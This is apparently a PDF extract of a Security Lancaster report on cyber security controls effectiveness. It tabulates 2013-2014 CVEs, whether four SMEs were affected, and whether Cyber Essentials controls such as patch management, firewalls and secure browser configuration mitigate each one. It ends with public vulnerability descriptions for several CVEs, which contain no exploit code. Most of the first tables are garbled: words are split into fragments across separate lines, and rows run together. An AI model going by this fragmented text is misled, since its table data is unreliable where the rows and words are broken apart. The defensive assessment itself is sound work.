Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
…agement

| CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
Cyber Security Controls Effectiveness - Security Lancaster, Page 17 of 28
| CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE |
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration |
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

